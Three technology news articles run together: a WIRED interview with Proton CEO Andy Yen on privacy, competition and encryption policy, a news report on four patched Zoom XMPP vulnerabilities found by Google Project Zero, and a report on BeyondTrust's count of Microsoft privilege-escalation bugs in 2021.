Since its founding in 2014, ProtonMail has become synonymous with user-friendly encrypted email. Now the company is trying to be synonymous with a whole lot more. On Wednesday morning, it announced that it’s changing its name to, simply, Proton—a nod at its broader ambitions within the universe of online privacy. The company will now offer an “ecosystem” of linked products, all accessed via one paid subscription. Proton subscribers will have access not just to encrypted email, but also an encrypted calendar, file storage platform, and VPN.

This is all part of CEO Andy Yen’s master plan to give Proton something close to a fighting chance against tech giants like Google. A Taiwanese-born former particle physicist, Yen moved to Geneva, Switzerland, after grad school to work at CERN, the nuclear research facility. Geneva proved a natural place to pivot to a privacy-focused startup, thanks to both Switzerland’s privacy-friendly legal regime and to a steady crop of poachable physicists. Today, Yen presides over a company with more than 400 employees and nearly 70 million users. He recently spoke to WIRED about the enduring need for greater privacy, the dangers of Apple's and Google's dominance, and how today’s attacks on encryption recall the rhetorical tactics of the War on Terror.

This interview has been condensed and lightly edited.

**WIRED: You're in the online privacy business. To start super broadly, how do you define privacy?**

**Andy Yen**: These days, all Google and Apple and Big Tech talk about is privacy, so the best way to give our definition is to give the contrast. The way Google defines privacy is, “Nobody can exploit your data, except for us.” Our definition is cleaner, more simple, and more authentic: Nobody can exploit your data—period. We literally want to build things that give us access to as little data as possible. The use of end-to-end encryption and zero-access encryption allows that. Because fundamentally, we believe the best way to protect user data is to not have it in the first place.

**If you ask someone, “Would you like more privacy or less?” they always say more. But if you watch how people actually behave, for most people, data privacy is not a very high priority. Why do you think that is?**

Privacy is inherent to being human. We have curtains on the windows, we have locks on our doors. But we tend to disconnect the digital world from the physical world. So if you take the analogy of Google, it's someone that's following you around every single day, recording everything that you say and every place you visit. In real life, we would never tolerate that. On the internet, somehow, because it's not visible, we tend to think that it's not there. But the surveillance that you don't notice tends to be far more insidious than the one that you do.

**Your company has come out in support of reforms to strengthen antitrust enforcement. But a lot of people argue that privacy and competition are in conflict. Apple will say, “If you force us to allow more competition on the platform that we run, then that will reduce our control over the security and the privacy of the user. So if you make us increase competition, that will bring privacy down.” And then you see the flip side of the argument, which is when Apple or Google implements some new privacy feature that may hurt competitors. How do you think about these potential conflicts?**

What Apple is basically claiming is, you need to let us continue our use of app store practices because we're the only company in the world that can get privacy right. It’s an attempt to monopolize privacy, which I don’t think makes any sense.

If you look at the FTC lawsuit against Facebook, the theory is that privacy and competition are two sides of the same coin. If you're not happy with Facebook's privacy practices, what is the alternative social media that you can go to other than Facebook and Instagram? You don't really have that many options. We need more players out there. If they had to compete, then competition would force privacy to be a selling point.

The same is true for other services that we offer. Today, Google controls the Android operating system, which is used by the majority of people, and they can preload all their applications as a default on your user devices. So they have a massive advantage already because users don't change the defaults. So even though their privacy practices are quite terrible for most people, there's no real pressure to change it because the alternatives don't really exist. And if they do exist, Google's able to hide them, because they set the defaults on their devices. So if you want to fix the privacy issue, the best way to do it is to have more competition, because then there will be user choice, and users tend to choose what is more private, because, as you said, everybody wants more privacy.

**Europe’s new Digital Market Act has a controversial section requiring the biggest messaging platforms to let competitors interoperate with them, while still preserving end-to-end encryption. But quite a lot of people** **argue** **that you can't actually do both of those things. So here's a place where privacy and competition really do seem to be conflicting with each other technologically.**

I have to say, this has been around since the early '90s. PGP is basically interoperable encryption, based on the email standard. So it may not be technologically the easiest to do. But to say it’s technologically impossible is also not correct.

**Another EU proposal** **would require companies to implement methods of detecting child sex abuse material, or CSAM, on their platforms. People are very alarmed about the implications of that for encryption.**

We're still in the process of analyzing it, so I can’t comment specifically on the details of the proposal. But these proposals are not new. In fact, they've been coming up in various forms over the past decade. What is novel and different this time is that these proposals used to be packaged under “terrorism.” Now, they’re packaged under CSAM. It was very clever to repackage this idea into a topic that is even more toxic, which makes informed debate difficult. Obviously, CSAM is a horrible problem, something that the world is better without. But a wholesale attack on encryption can have unforeseeable consequences that are not always completely understood or considered by the drafters of these proposals.

**Do you think that this** _**is**_ **a wholesale attack on encryption, though? The people making these proposals say, “We're not attacking encryption. You just have to figure out a way to monitor for CSAM.”**

Well, there is really no practical way in today's technology to do that in a way that doesn't weaken encryption.

**The analogy to terrorism is interesting because, during the Bush-era War on Terror, there was a sense of literally anything being justified in the name of stopping terrorism. The US government was secretly spying on its own citizens. It was really hard to argue that we have to accept that some terrorism is going to happen. It's even harder to say, look, we've got to accept that some amount of child exploitation is going to happen and people are going to use digital tools to spread it. But at some point, I think you do have to defend the principle that we have to tolerate a certain amount of even the very worst things if we want to have meaningful civil liberties.**

If there was no privacy in the world, that world would be more “secure.” But that world does exist; it's called North Korea. And the people that live there probably don't feel very secure. As a democracy, you have to strike the right balance. The balance is not total mass surveillance of everybody, because we know that there are serious consequences to democracy and freedom as a result of that. It's not easy to find the right balance. But during the Bush years, with terrorism, I think they went to an extreme that really was a backsliding on democracy. And this is something that we need to avoid.

**But then on the flip side,** **you read stories** **about law enforcement catching really bad criminals, and in a lot of those stories, if that person had used a Tor browser and a ProtonMail account and a VPN, and so on, they might not have been caught. Do you ever worry about a future where all the bad guys get smart enough to use the best privacy tools, and it becomes too easy to evade the legal system entirely?**

Well, encryption and privacy technologies are what I would call dual-use. What is law enforcement also concerned about these days? People’s information being stolen, sensitive communications being hacked, emails of political campaigns being stolen by state actors and disseminated to shift the political balance. In order to prevent all of those potential ills, you need privacy, encryption, and good security. So, the same tools that people in law enforcement criticize are actually the same things that are shielding a lot of the internet ecosystem and the economy from a disastrous outcome. If you were to weaken or prohibit all of these security tools and privacy tools, then you would open the floodgate to a massive amount of cybercrime and data breaches.

**Proton has grown a lot over the years, but it’s still basically a rounding error compared to something like Google. We’ve talked about competition from a regulatory perspective, but on a practical level, how do you even try to compete with your massive rivals?**

The current plan is the launch of the Proton ecosystem. It's one account that gives you access to four privacy services: Proton Mail, Proton Calendar, Proton Drive, and Proton VPN. One subscription that gives you access to all those services. It's the first time anybody has taken a series of privacy services and combined them to form a consolidated ecosystem. That doesn't match all of Big Tech’s offerings, of course. But I think it provides, for the first time, a viable alternative that lets people say, “If I really want to get off of Google, I can now do it, because I have enough components to live a lot of my daily life.” For the first time, you’ll have a privacy option that’s not fully competitive with Google, but reasonably competitive, and that will start to break the dam. I don't know how it will go, but I think this is the future of privacy, and that’s why we're doing it.

**This is probably the first time I have ever thought about having an encrypted calendar.**

A calendar is essentially a record of your life: everybody you've met, everywhere you’ve been, everything that you have done. It's extremely sensitive. So you don't intuitively think about protecting that, but actually, it's essential.

**And by making that encrypted, who am I protecting that information from?**

Maybe it's the government requesting information on you. Maybe it's a data leak. Maybe it's a change in business model of your cloud provider at some point in the future that decides that they want to monetize user data in a different way. Your data is just one acquisition away from going across the border to a country that you didn't expect when you signed up for the service.

**Right. Elon Musk is about to own all my Twitter DMs.**

Exactly right. And with end-to-end encryption, no matter what happens, it's your data; you control it. It's just a mathematical guarantee.

**But what if I move all my stuff to the Proton ecosystem, and then like four years from now, you go out of business? What happens to my stuff?**

Proton has been around for eight years now. In the tech space, that's a long time. I think an indicator of what is sustainable in the long term is alignment between the business and the customers. Our business model is simple: Premium users pay us to keep theie data private, and our only incentive is to keep it private. Sometimes the easiest and simplest models are the ones that are the most durable. I strongly believe that Proton will be a company that outlives us.

Proton Is Trying to Become Google—Without Your Data

Popular video conferencing service Zoom has resolved as many as four security vulnerabilities, which could be exploited to compromise another user over chat by sending specially crafted Extensible Messaging and Presence Protocol (XMPP) messages and execute malicious code.
Tracked from CVE-2022-22784 through CVE-2022-22787, the issues range between 5.9 and 8.1 in severity. Ivan Fratric of Google

Popular video conferencing service Zoom has resolved as many as four security vulnerabilities, which could be exploited to compromise another user over chat by sending specially crafted Extensible Messaging and Presence Protocol (XMPP) messages and execute malicious code.

Tracked from CVE-2022-22784 through CVE-2022-22787, the issues range between 5.9 and 8.1 in severity. Ivan Fratric of Google Project Zero has been credited with discovering and reporting all the four flaws in February 2022.

The list of bugs is as follows -

*   **CVE-2022-22784** (CVSS score: 8.1) - Improper XML Parsing in Zoom Client for Meetings
*   **CVE-2022-22785** (CVSS score: 5.9) - Improperly constrained session cookies in Zoom Client for Meetings
*   **CVE-2022-22786** (CVSS score: 7.5) - Update package downgrade in Zoom Client for Meetings for Windows
*   **CVE-2022-22787** (CVSS score: 5.9) - Insufficient hostname validation during server switch in Zoom Client for Meetings

With Zoom's chat functionality built on top of the XMPP standard, successful exploitation of the issues could enable an attacker to force a vulnerable client to masquerade a Zoom user, connect to a malicious server, and even download a rogue update, resulting in arbitrary code execution stemming from a downgrade attack.

Fratric dubbed the zero-click attack sequence as a case of "XMPP Stanza Smuggling," adding "one user might be able to spoof messages as if coming from another user" and that "an attacker can send control messages which will be accepted as if coming from the server."

At its core, the issues take advantage of parsing inconsistencies between XML parsers in Zoom's client and server to "smuggle" arbitrary XMPP stanzas — a basic unit of communication in XMPP — to the victim client.

Specifically, the exploit chain can be weaponized to hijack the software update mechanism and make the client connect to a man-in-the-middle server that serves up an old, less secure version of the Zoom client.

While the downgrade attack singles out the Windows version of the app, CVE-2022-22784, CVE-2022-22785, and CVE-2022-22787 impact Android, iOS, Linux, macOS, and Windows.

The patches arrive less than a month after Zoom addressed two high-severity flaws (CVE-2022-22782 and CVE-2022-22783) that could lead to local privilege escalation and exposure of memory content in its on-premise Meeting services. Also fixed was another instance of a downgrade attack (CVE-2022-22781) in Zoom's macOS app.

Users of the application are recommended to update to the latest version (5.10.0) to mitigate any potential threats arising out of active exploitation of the flaws.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

New Zoom Flaws Could Let Attackers Hack Victims Just by Sending them a Message

But there was a substantial drop in the overall number of critical vulnerabilities that the company disclosed last year, new analysis shows.

The number of privilege escalation bugs in Microsoft's products increased for the second year in a row in 2021, highlighting the growing risk this vulnerability category poses for organizations.

BeyondTrust recently analyzed data from Microsoft vulnerability disclosures in 2021 and found that 588 — or 49% — of the total 1,212 bugs that the company disclosed gave attackers a way to elevate privileges on compromised systems and networks. The number represented a 5% increase from the 559 privilege escalation bugs in Microsoft products that BeyondTrust counted in 2020, when such bugs also eclipsed all other categories of vulns in the company's technologies.

The trend is important because organizations sometimes tend to pay less attention to privilege escalation vulnerabilities than other bugs because often, they can only be exploited after an attacker has already compromised a system. "Elevation of privilege bugs do not get the same attention from organizations" as some other vulnerabilities, says Tim McGuffin, director of adversarial engineering at LARES Consulting. Most organizations focus on preventing initial compromise, which can come from remote code execution vulnerabilities and other flaws, he says. "But \[they\] often de-prioritize patches for EoP vulns and wait until quarterly or annual patch cycles."

**A New Trend**

The number of privilege escalation vulnerabilities in Microsoft's technologies increased last year even as the overall number of reported bugs in the company's products declined for the first time in years. The 1,212 bugs that Microsoft disclosed in 2021 was about 5% lower than the 1,268 bugs it reported in 2020. That was in sharp contrast to the previous four years, which saw a near doubling in bugs — from 451 in 2016 to 858 in 2019.

BeyondTrust also observed a 47% decrease in the number of critical vulnerabilities that Microsoft disclosed in 2021 — 104 compared to 196 in 2020. The number of Windows OS vulnerabilities, too, dropped dramatically in 2021 — from a record 907 vulnerabilities across Windows 7, Windows RT, Windows 8/8.1, and Windows 10 to just 507 last year.

Remote code execution vulnerabilities, which were the most common type of security issue in Microsoft products until 2019, ranked second last year at 326, followed by information disclosure vulnerabilities (119), spoofing (66), and denial of service bugs (55). Microsoft reported a total of 44 security bypass vulnerabilities last year and 3 issues related to tampering. BeyondTrust observed declines in other vulnerabilities such as in overflow, memory corruption, and cross-site scripting flaws in Microsoft technologies. Cumulatively, there were 215 fewer vulnerabilities across these three categories in 2021 compared to the prior year.

The vendor ascribed several likely reasons for the Microsoft vulnerability reductions last year, including better security and coding practices on Microsoft's part; end of life of Windows 7 and other products: and the shift of more enterprise workloads and services to the cloud.

**Fewer Critical Vulnerabilities**

"A drop in critical vulnerabilities reported from 196 to 104 is great news," says Richard Stiennon, chief research analyst at IT-Harvest. "Yet it's hard to derive insights from just the numbers."

The increase in privilege escalation vulnerabilities, for instance, is significant because it indicates that researchers are looking harder for these flaws in Microsoft products. "These are critical because an attacker will use them to ultimately get admin privileges and thus complete control of a system," Stiennon says. "APT groups usually have some sort of escalation exploits in their toolboxes to compromise their targets."

Microsoft's late-2021 adoption of the industry-standard CVSS format for reporting vulnerabilities also made it impossible to determine how many of the critical vulnerabilities it disclosed last year could have been mitigated by removing admin rights on user systems, BeyondTrust said.

The CVSS is derived from data that is designed to produce a numerical score relative to the severity of a vulnerability, says Christopher Hills, chief security strategist at BeyondTrust. "This is great for the overall audience in seeing which vulnerabilities have the highest severity," he says. "But it provides camouflage for those vulnerabilities that leverage privilege elevation because those are now buried in the report."

Between 2015 and 2020, some 75% of critical Microsoft vulnerabilities could have been mitigated by removing admin rights on user systems. There's little reason to believe that the situation has changed a whole lot now, according to BeyondTrust.

"With end user systems and remote access being the top attack vector for bad actors, there truly is no valid reason why users should have standing rights or admin rights on end user systems," Hills says. Removal of admin rights has the potential to impact end user productivity and foster a bad user experience, he admits: "But with today’s technology and the solutions available, there is no amount of end user productivity that could outweigh the cost of a breach or compromise."

McGuffin says the decline in reported Microsoft vulnerabilities last year could also have to do with other reasons. Some countries have modified their vulnerability disclosure processes so that newly discovered vulnerabilities must be reported to the government first — and only then can be reported to the vendor, he notes. "Those same countries have also restricted citizens' ability to participate in competitions like Pwn2Own, where vulnerabilities would be publicly disclosed after the competition," he notes.

And because researchers sometimes focus on specific areas and technologies, that also can have an impact on the number of vulnerabilities discovered in a particular category, McGuffin says. "As an example, one vulnerability in the \[Windows\] print spooler service prompted several other researchers to dig deeper, and we're up to over a dozen RCE and PrivEsc vulns in the spooler now," he says.

Tag

#windows